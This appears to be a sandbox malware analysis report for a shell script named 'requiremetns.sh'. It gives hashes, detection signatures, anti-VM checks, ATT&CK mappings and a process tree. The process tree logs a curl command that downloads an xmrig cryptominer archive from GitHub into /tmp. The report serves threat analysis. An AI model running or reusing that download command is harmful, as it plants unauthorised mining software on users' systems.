d97530313d2423ba8c3e87ccd3d66e6cd77997d26bbb4d1dd2a5f32827dde8cd

Analysis

max time kernel
149s
max time network
8s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
01/07/2024, 08:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

requiremetns.sh
Size

8KB
MD5

97423634cc1762b2f010cb860e7fb47d
SHA1

2f50775e8fe9ab98a80f06d835c5874091bf0b3e
SHA256

d97530313d2423ba8c3e87ccd3d66e6cd77997d26bbb4d1dd2a5f32827dde8cd
SHA512

bd5279178f713edaca1754937a859fa41dbec1fdd15c8ad3cb11894142e389d97bf3ca7f0402c018a616053b1121650ed609498a4b34c4def829e02924f6de1f
SSDEEP

192:fFa1ZIJvH8czpCyzdpB3f1SAij8E3YUNvmTC8KfbmP/oYv0Yd:fEHexC+HSAHE3YUN+TC8SbmQUfd

Score

6^/10

antivm

Malware Config

Signatures

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

T1102

flow	ioc
1	raw.githubusercontent.com

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 2 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl

/tmp/requiremetns.sh
/tmp/requiremetns.sh
1⤵
PID:673
- /usr/bin/cut
  cut -f1 -d.
  2⤵
  PID:681
- /usr/bin/nproc
  nproc
  2⤵
  PID:684
- /usr/bin/curl
  curl -L --progress-bar https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.tar.gz -o /tmp/xmrig.tar.gz
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  PID:688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads